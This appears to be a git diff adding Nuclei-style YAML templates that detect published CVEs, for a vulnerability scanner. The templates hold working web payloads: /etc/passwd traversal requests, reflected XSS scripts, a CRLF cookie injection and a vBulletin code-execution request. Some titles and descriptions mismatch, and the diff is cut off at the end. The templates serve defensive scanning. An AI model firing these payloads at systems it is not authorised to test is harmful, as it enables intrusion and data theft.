a/cves/2010/CVE-2010-2918.yaml b/cves/2010/CVE-2010-2918.yaml new file mode 100644 index 0000000000..b8ddd64eb5 --- /dev/null +++ b/cves/2010/CVE-2010-2918.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2918 + +info: + name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion + author: daffainfo + severity: high + description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + reference: + - https://www.exploit-db.com/exploits/31708 + - https://www.cvedetails.com/cve/CVE-2010-2918 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-3203.yaml b/cves/2010/CVE-2010-3203.yaml new file mode 100644 index 0000000000..7f5245195e --- /dev/null +++ b/cves/2010/CVE-2010-3203.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-3203 + +info: + name: Joomla! Component PicSell 1.0 - Local File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + reference: | + - https://www.exploit-db.com/exploits/14845 + - https://www.cvedetails.com/cve/CVE-2010-3203 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4282.yaml b/cves/2010/CVE-2010-4282.yaml new file mode 100644 index 0000000000..074fd7401b --- /dev/null +++ b/cves/2010/CVE-2010-4282.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4282 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + reference: + - https://www.exploit-db.com/exploits/15643 + - https://www.cvedetails.com/cve/CVE-2010-4282 + tags: cve,cve2010,lfi,joomla + +requests: + - method: GET + path: + - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4719.yaml b/cves/2010/CVE-2010-4719.yaml new file mode 100644 index 0000000000..145fed21d3 --- /dev/null +++ b/cves/2010/CVE-2010-4719.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4719 + +info: + name: Joomla! Component JRadio - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15749 + - https://www.cvedetails.com/cve/CVE-2010-4719 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4769.yaml b/cves/2010/CVE-2010-4769.yaml new file mode 100644 index 0000000000..3de9150cf4 --- /dev/null +++ b/cves/2010/CVE-2010-4769.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4769 + +info: + name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15585 + - https://www.cvedetails.com/cve/CVE-2010-4769 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4977.yaml b/cves/2010/CVE-2010-4977.yaml new file mode 100644 index 0000000000..eb135d7ccc --- /dev/null +++ b/cves/2010/CVE-2010-4977.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4977 + +info: + name: Joomla! Component Canteen 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34250 + - https://www.cvedetails.com/cve/CVE-2010-4977 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-5028.yaml b/cves/2010/CVE-2010-5028.yaml new file mode 100644 index 0000000000..01a95abcad --- /dev/null +++ b/cves/2010/CVE-2010-5028.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-5028 + +info: + name: Joomla! Component JE Job 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + reference: + - https://www.exploit-db.com/exploits/12601 + - https://www.cvedetails.com/cve/CVE-2010-5028 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-5286.yaml b/cves/2010/CVE-2010-5286.yaml new file mode 100644 index 0000000000..e27c4edeb5 --- /dev/null +++ b/cves/2010/CVE-2010-5286.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-5286 + +info: + name: Joomla! Component Jstore - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34837 + - https://www.cvedetails.com/cve/CVE-2010-5286 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2011/CVE-2011-2744.yaml b/cves/2011/CVE-2011-2744.yaml new file mode 100644 index 0000000000..041e731693 --- /dev/null +++ b/cves/2011/CVE-2011-2744.yaml @@ -0,0 +1,27 @@ +id: CVE-2011-2744 + +info: + name: Chyrp 2.x - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + reference: + - https://www.exploit-db.com/exploits/35945 + - https://www.cvedetails.com/cve/CVE-2011-2744 + tags: cve,cve2011,lfi,chyrp + +requests: + - method: GET + path: + - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-0981.yaml b/cves/2012/CVE-2012-0981.yaml new file mode 100644 index 0000000000..549281d0ab --- /dev/null +++ b/cves/2012/CVE-2012-0981.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-0981 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/18435 + - https://www.cvedetails.com/cve/CVE-2012-0981 + tags: cve,cve2012,lfi,phpshowtime + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-0996.yaml b/cves/2012/CVE-2012-0996.yaml new file mode 100644 index 0000000000..b096e5a0ba --- /dev/null +++ b/cves/2012/CVE-2012-0996.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-0996 + +info: + name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. + reference: + - https://www.exploit-db.com/exploits/36784 + - https://www.cvedetails.com/cve/CVE-2012-0996 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-1226.yaml b/cves/2012/CVE-2012-1226.yaml new file mode 100644 index 0000000000..40b0d31332 --- /dev/null +++ b/cves/2012/CVE-2012-1226.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-1226 + +info: + name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. + reference: + - https://www.exploit-db.com/exploits/36873 + - https://www.cvedetails.com/cve/CVE-2012-1226 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml index 35cf6180ea..2b8df419a9 100644 --- a/cves/2013/CVE-2013-7240.yaml +++ b/cves/2013/CVE-2013-7240.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 tags: cve,cve2013,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2013-7240 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2014/CVE-2014-10037.yaml b/cves/2014/CVE-2014-10037.yaml new file mode 100644 index 0000000000..7acb0d68b5 --- /dev/null +++ b/cves/2014/CVE-2014-10037.yaml @@ -0,0 +1,27 @@ +id: CVE-2014-10037 + +info: + name: DomPHP 0.83 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php. + reference: + - https://www.exploit-db.com/exploits/30865 + - https://www.cvedetails.com/cve/CVE-2014-10037 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4539.yaml b/cves/2014/CVE-2014-4539.yaml new file mode 100644 index 0000000000..e990363423 --- /dev/null +++ b/cves/2014/CVE-2014-4539.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4539 + +info: + name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 + tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4539 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4550.yaml b/cves/2014/CVE-2014-4550.yaml new file mode 100644 index 0000000000..898d13a6bd --- /dev/null +++ b/cves/2014/CVE-2014-4550.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4550 + +info: + name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 + tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4550 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4558.yaml b/cves/2014/CVE-2014-4558.yaml new file mode 100644 index 0000000000..38f4f31020 --- /dev/null +++ b/cves/2014/CVE-2014-4558.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4558 + +info: + name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 + tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4558 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4561.yaml b/cves/2014/CVE-2014-4561.yaml new file mode 100644 index 0000000000..257dd609d7 --- /dev/null +++ b/cves/2014/CVE-2014-4561.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4561 + +info: + name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d + - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 + tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4561 + cwe-id: CWE-79 + description: "The ultimate-weather plugin 1.0 for WordPress has XSS" + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4592.yaml b/cves/2014/CVE-2014-4592.yaml new file mode 100644 index 0000000000..db868347e2 --- /dev/null +++ b/cves/2014/CVE-2014-4592.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4592 + +info: + name: WP Planet <= 0.1 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 + tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4592 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-5111.yaml b/cves/2014/CVE-2014-5111.yaml new file mode 100644 index 0000000000..f525a4441f --- /dev/null +++ b/cves/2014/CVE-2014-5111.yaml @@ -0,0 +1,27 @@ +id: CVE-2014-5111 + +info: + name: Fonality trixbox - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. + reference: | + - https://www.exploit-db.com/exploits/39351 + - https://www.cvedetails.com/cve/CVE-2014-5111 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-5258.yaml b/cves/2014/CVE-2014-5258.yaml new file mode 100644 index 0000000000..70144e35a4 --- /dev/null +++ b/cves/2014/CVE-2014-5258.yaml @@ -0,0 +1,27 @@ +id: CVE-2014-5258 + +info: + name: webEdition 6.3.8.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/34761 + - https://www.cvedetails.com/cve/CVE-2014-5258 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index 75c35ff769..52ad59227d 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -7,13 +7,13 @@ info: reference: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - tags: cve,cve2015,wordpress,wp-plugin,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2015-1000012 cwe-id: CWE-200 description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" + tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET diff --git a/cves/2015/CVE-2015-4414.yaml b/cves/2015/CVE-2015-4414.yaml new file mode 100644 index 0000000000..ac61202462 --- /dev/null +++ b/cves/2015/CVE-2015-4414.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-4414 + +info: + name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/37274 + - https://www.cvedetails.com/cve/CVE-2015-4414 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2015/CVE-2015-4632.yaml b/cves/2015/CVE-2015-4632.yaml new file mode 100644 index 0000000000..6e9567001c --- /dev/null +++ b/cves/2015/CVE-2015-4632.yaml @@ -0,0 +1,32 @@ +id: CVE-2015-4632 + +info: + name: Koha 3.20.1 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. + reference: | + - https://www.exploit-db.com/exploits/37388 + - https://www.cvedetails.com/cve/CVE-2015-4632 + tags: cve,cve2015,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-4632 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2016/CVE-2016-4975.yaml b/cves/2016/CVE-2016-4975.yaml new file mode 100644 index 0000000000..1bc031521f --- /dev/null +++ b/cves/2016/CVE-2016-4975.yaml @@ -0,0 +1,24 @@ +id: CVE-2016-4975 + +info: + name: Apache mod_userdir CRLF injection + author: melbadry9,nadino,xElkomy,sullo + severity: low + description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + tags: crlf,generic,cves,cve2016 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-4975 + cwe-id: CWE-93 + +requests: + - method: GET + path: + - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" + + matchers: + - type: regex + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' + part: header diff --git a/network/openssh5.3-detect.yaml b/cves/2016/CVE-2016-6210.yaml similarity index 73% rename from network/openssh5.3-detect.yaml rename to cves/2016/CVE-2016-6210.yaml index 1bfb60d273..a43f9a10b5 100644 --- a/network/openssh5.3-detect.yaml +++ b/cves/2016/CVE-2016-6210.yaml @@ -1,15 +1,20 @@ -id: openssh5.3-detect +id: CVE-2016-6210 info: name: OpenSSH 5.3 Detection author: iamthefrogy - severity: low + severity: medium tags: network,openssh description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 - https://security-tracker.debian.org/tracker/CVE-2016-6210 - http://openwall.com/lists/oss-security/2016/08/01/2 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 + cve-id: CVE-2016-6210 + cwe-id: CWE-200 network: - host: diff --git a/cves/2018/CVE-2018-0127.yaml b/cves/2018/CVE-2018-0127.yaml new file mode 100644 index 0000000000..81f3f82937 --- /dev/null +++ b/cves/2018/CVE-2018-0127.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-0127 + +info: + name: Cisco RV132W and RV134W Router Information Disclosure + author: jrolf + severity: critical + description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information. + tags: cve,cve2018,cisco,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-0127 + cwe-id: CWE-306 + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2 + - http://www.securitytracker.com/id/1040345 + - http://www.securityfocus.com/bid/102969 + +requests: + - method: GET + path: + - "{{BaseURL}}/dumpmdm.cmd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Dump" + - "MDM" + - "cisco" + - "admin" + part: body \ No newline at end of file diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml index 7917672a21..28a33d2049 100644 --- a/cves/2019/CVE-2019-16759.yaml +++ b/cves/2019/CVE-2019-16759.yaml @@ -1,10 +1,10 @@ id: CVE-2019-16759 info: - name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass + name: RCE in vBulletin v5.0.0-v5.5.4 fix bypass author: madrobot severity: critical - reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ + reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/ tags: cve,cve2019,vbulletin,rce classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -17,6 +17,7 @@ requests: - raw: - | POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo(); diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index a1a7023154..8fbe69c719 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -1,29 +1,30 @@ -id: CVE-2019-17538 -info: - name: Jnoj Directory Traversal for file reading(LFI) - author: pussycat0x - severity: high - reference: https://github.com/shi-yang/jnoj/issues/53 - tags: cve,cve2019,jnoj,lfi - +id: CVE-2019-17538 +info: + name: Jnoj arbitrary local file inclusion (LFI) + author: pussycat0x + severity: high + reference: https://github.com/shi-yang/jnoj/issues/53 + tags: cve,cve2019,jnoj,lfi + classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2019-17538 cwe-id: CWE-22 - description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring." -requests: - - raw: - - | - GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body + description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has directory traversal (LFI) vulnerability via web/polygon/problem/viewfile?id=1&name=../" +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/cves/2019/CVE-2019-20183.yaml similarity index 68% rename from vulnerabilities/other/simple-employee-rce.yaml rename to cves/2019/CVE-2019-20183.yaml index f965f9f0b6..40c1051b84 100644 --- 